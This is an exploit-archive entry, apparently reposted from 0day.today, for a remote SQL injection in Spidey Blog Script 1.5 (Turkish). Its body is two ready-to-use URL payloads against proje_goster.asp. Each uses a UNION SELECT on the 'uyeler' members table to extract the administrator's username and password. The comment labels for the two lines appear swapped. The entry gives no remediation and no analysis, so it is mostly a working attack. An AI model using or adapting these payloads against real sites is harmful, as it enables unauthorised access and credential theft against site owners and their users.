id: 693
date: 08/13/2006
title: Spidey Blog Script <= 1.5 (tr) Remote SQL Injection Vulnerability
author: ASIANEAGLE
cves: 

=================================================================
Spidey Blog Script <= 1.5 (tr) Remote SQL Injection Vulnerability
=================================================================




###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability  #
#Author : ASIANEAGLE                                          #
#Site   : www.asianeagle.org                                  #
###############################################################
#Risk   : High

#Exploit;
#Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201

#Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201




#  0day.today [2023-03-26]  #